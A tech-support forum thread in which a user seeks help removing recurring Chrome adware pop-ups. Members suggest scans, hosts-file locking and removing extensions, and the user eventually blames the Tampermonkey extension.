HUGE mystery: Can't get Adware to go away no matter what I do?

Sidebar Sidebar
angelness

angelness

Prominent
Apr 9, 2017
10
0
570
Adware has always been a joke to me. In the past, I've managed to easily remove it off my grandparent's PC or wherever I saw it. It's usually always either a toolbar or an extension. However, recently my PC has become infected and no matter what I do, IT WON'T GO AWAY! I've tried EVERYTHING and I'm really desperate :( This really is a huge mystery to me! I keep getting outbound requests from Google Chrome to sketchy websites but Malware Bytes keeps blocking them.

Here are the list of things I've tried to get rid of it:
•Check to see if there is any unwanted installed software
•Scanned my PC with 2 antivirus programs multiple times and always getting a positive clean result (Malware Bytes and Norton)
•Use Adware Cleaner (Which did manage to detect and remove several infections but I guess it came back and now it's not detecting anything)
•Changed my router's DNS server
•Flushed the DNS server
•Restarted my router
•Checked to see if there was a homepage for an unwanted website (There was and I removed it)
•Checked to see if there was an unwanted website added to my browser's shortcut
•Checked to see if there was an unwanted extension installed
•Uninstall and reinstall Google Chrome
•Cleared all the cookies
•Completely clear everything off my browser
•Used CCleaner on my PC
•Googled how to remove the specific adware and followed the steps
•Installed Hitman Pro and it detected nothing

Things I should mention, this problem first started on my laptop but then I built my first ever PC and the problem migrated over here for some reason. Same websites as well (Always Tradeexchage and PopCash). The adware never show up though. My firewall always tells me that it has blocked it. But I fear that they are adding more adware to my PC since sometimes I get 3 or 4 pop ups from different websites. They only pop up when I use Google Chrome. I think one tried to pop up when I used Microsoft Edge but the notification popped up when immediately when I clicked a link and the outbound request was from a different website than usual. I barely use Mozilla Firefox so I don't know if it pops up from there.

Please help me, in one month, I have had 800+ pop ups blocked by Malware Bytes. They are really annoying. Any help would be HIGHLY appreciated!

Screenshot of Malware Bytes reports:
a4fa17f0feb222a854eb9b8aa7f6ec38.gif
 
Solution
angelness
Hello, everyone! It's been about a week and the pop ups seemed to have finally gone away! The nightmare seems to be finally over.
This might be premature, who knows, but this is the longest I've ever gone without a single pop up. It's been about a week.

So to anyone who might be reading this and might have this exact problem, let me tell you what I did:
1) At least try everything listed in the original post
2) Uninstalled Tampermonkey
3) Uninstalled any unnecessary addons/plug ins (EVEN THE ONES I TRUSTED)
4) On Chrome went to Settings>Advanced> Privacy and Security>Content Settings>Cookies and then I cleared everything that was unfamiar to me or unwanted under "All cookies and site data" and then under "Block...
Sort by date Sort by votes
Herc08

Herc08

Respectable
Aug 6, 2016
236
0
1,910
Well you pretty much did everything I would suggest except format your hard drive and re-install Windows. I would also uninstall any extensions you may have in Chrome as well.
 
Upvote 0 Downvote
angelness

angelness

Prominent
Apr 9, 2017
10
0
570


Re-installing Windows/reformatting the hard drive wouldn't work since this problem came from my old laptop or because I visited a site again. It might have transferred from one computer to another but I don't know if its because I have a router infection or if its because I have Google Chrome synced to an account. Also my phone and tablets don't have this problem. I've also tried uninstalling every extension and the problem still persists. Also, I didn't do that list in order nor did I do them together in the same session.

Do you have a list of steps you'd recommend? (Besides reformatting the hard drive/reinstalling Windows?). It is adware after all. Hopefully, there is a way to remove it. I might just be over looking something.
 
Upvote 0 Downvote
Karadjgne

Karadjgne

Distinguished
Herald
Dec 26, 2012
263
0
19,310
Sounds suspiciously like the Hosts file has been tampered with.
When you ran malwarebytes, did you have it set to check for root kits?
Try using Spybot-Search & Destroy, it has settings to lock the Hosts file. When you run it (after full updates) do so with the internet unplugged physically. You'll get a warning if anything is trying to change the Hosts file, and should be able to backtrack.
 
Upvote 0 Downvote
angelness

angelness

Prominent
Apr 9, 2017
10
0
570


Yeah, I have the setting turn on for rootkits in Malwarebytes. I've also used Malware Byte's seperate Anti-Rootkit finder.
I'll try your suggestion in an hour or so but before I do, what do you mean by backtrack? What exactly am I looking for? Will I have to manually rewrite the hosts file? I've tweaked with it in the past so I have the original copy for it. Will replacing it with the original fix it? Also is the free version for Spybot-Search & Destroy good enough?
 
Upvote 0 Downvote
Karadjgne

Karadjgne

Distinguished
Herald
Dec 26, 2012
263
0
19,310
Having a Hosts file prior to all this happening would be great! Yes, the free version is fine. What you do is run everything you can but don't reboot/reset. This deletes all that can be deleted, without the sleeper program searching for installed files. Then you add a copy of the original hosts file and lock it down. Only after that do you reset. Upon reset, while windows is loading, the sleeper program will go looking for installed files and won't find them, so will try to re-add them, especially to the Hosts file, but that's now locked out to changes. This'll throw up a warning that some program is trying to throw you a loop, you'll get to see what program this is. It'll be something usually in the windows/program files folder and has ties in the registry. This is when you can use something like CCleaner to clean out the registry, which looks for those oddball files that lead nowhere.

No Antivirus/malware software is perfect. They rely on user input to send the devs reports and malware so they can design and interpret necessary actions. This is why MB missed, Norton missed, but the other program found something.

You should also go into your browsers, ie and Chrome etc and under settings/add-ons or extensions, make sure to deny popcash.net,or delete it etc or every time you start a browser, it'll search out that extension, not find it, so will download and replace it, basically making you start all over again with the malware removal process.
 
Upvote 1 Downvote
T

TMTOWTSAC

Estimable
Jun 27, 2015
97
0
4,610
Have you tried using a different browser to see if it's Chrome specific or not? Also, just to verify do you get that traffic occurring everywhere? Or only when you visit certain sites?
 
Upvote 0 Downvote
angelness

angelness

Prominent
Apr 9, 2017
10
0
570


Apologies for the late response. For some odd reason, my email notifications did not alert me of any responses and I got caught up with work. I don't understand what you mean by "run everything you can but don't reboot/reset". Do you mean run every program I can or something else? I apologize for not understanding.

Also for the browser, there are no settings to deny any extensions from any website.
57e77a312dade0ae80b25e7af7b6ad48.png


However I did try this:
bzcO4it.png

Is this good enough?
 
Upvote 0 Downvote
angelness

angelness

Prominent
Apr 9, 2017
10
0
570


I downloaded and scanned my PC with this but I'm not exactly sure what I'm looking for. Is there anything specific I should keep an eye out for?
 
Upvote 0 Downvote
angelness

angelness

Prominent
Apr 9, 2017
10
0
570


I did what you suggested and I came out clean. Perhaps it might be a router malware?
214df544ae2576f8764f35058f35223b.png
 
Upvote 0 Downvote
M

mdd1963

Distinguished
Jan 14, 2006
607
1
20,060


The things highlighted in green are whitelisted, known processes, so exempt from decision making...

Many others, you will quickly recognize them from their respective folders/locations, such as DropBox, SecureAge, Intel, Apple, etc...

Every single non-green(whitelisted) entry should be reviewed...

If you want to stretch out your display and grab printscreen/screenshots of various entries, I'd be glad to see if anything looks suspect

Example with my own Freefixer scan results:
http://s254.photobucket.com/user/mdd1963/media/2017-07-05.png.html?sort=3&o=0
2017-07-05.png.html
 
Upvote 0 Downvote
angelness

angelness

Prominent
Apr 9, 2017
10
0
570


No. It seems to pop up randomly at any given time. However, I do notice it more on any Google related websites such as Google Images, YouTube, and even opening up a new tab on Chrome.
 
Upvote 0 Downvote
angelness

angelness

Prominent
Apr 9, 2017
10
0
570


Thank you for your help. Here's my screenshots of the results:

Screenshot 1:
4261478b6c7052dfc8a7b51b94b42519.png


Screenshot 2:
ddca12302cc5f5b411f1580e89e740d4.png


Screenshot 3:
9bb82d18fe127dbe04b7985ca0ca3f77.png


Screenshot 4:
cd2814351c2cbecf731dbe74f137be9d.png


Screenshot 5:
37acd04c87dfc60ccf70d07ba0a4fcfb.png


Screenshot 6:
457ad032ddf7c8a73da886e9ec8860fc.png


Screenshot 7:
47c003ed68280727ff3ddd798086f61e.png


I have a lot of pop up blockers/adblock/blocking of other stuff since I've been trying to block any more possible adware. I've been a bit paranoid to say the least.
 
Upvote 0 Downvote
angelness

angelness

Prominent
Apr 9, 2017
10
0
570
Well no one has really posted anything on here in a while but I think I found the solution, maybe. For the first time ever, Tradeexchange and PopCash haven't tried to pop up for several days. I believe the Chrome extension "Tampermonkey" was infected with adware or something. I gooogled "Tampermonkey Adware' and it seems to be a common problem. I'll post an update in a week to see if it has gone away.
 
Upvote 0 Downvote
Karadjgne

Karadjgne

Distinguished
Herald
Dec 26, 2012
263
0
19,310
Extensions are BHO's (browser helper objects) so as such are not regulated by any Antivirus or malware sniffers. Having one infected / sourced by malware will definitely bypass any searches as it only opens up a Trojan-like pop-up when the browser is opened, but can thereby reinfect the entire network, every time it's used. So you clean out the pc, open Chrome, and whammo! Right back where you started from, all nicely infected.
 
Upvote 1 Downvote
M

mdd1963

Distinguished
Jan 14, 2006
607
1
20,060
nothing is really jumping out at me as being obviously suspicious on freefixer, unfortunately.....

You could certainly delete any/all 'not-well-known' add-blockers from assorted browsers...

Delete them everywhere they show on freefixer, as well....
 
Upvote 0 Downvote
You must log in or register to reply here.

Similar threads

MissMagicalGirl
  • Question
Question extension called options keeps showing up on chrome
Replies
5
Views
5K
Antivirus / Security / Privacy
MissMagicalGirl
MissMagicalGirl
G
  • Locked
Question How could I get Alexa to run Siri shortcuts
Replies
2
Views
13K
Smart Home
theabraham90
theabraham90
pati_yeet
  • Solved
Solved! Keep getting random videos playing in the background and sometimes get google searches redirected to trovi
Replies
7
Views
7K
Apps General Discussion
pati_yeet
pati_yeet
spareddiamond46
  • Solved
Solved! what do i do about this virus. or what its even called.
Replies
6
Views
3K
Laptop General Discussion
AlHuneke
A
M
  • Question
Info Bye bye Avira after 12 years not without first bursting my PC!
Replies
1
Views
6K
Antivirus / Security / Privacy
mejustsayin
mejustsayin

TRENDING THREADS

Share this page

COMPANY
RESOURCES
FOLLOW
Top Bottom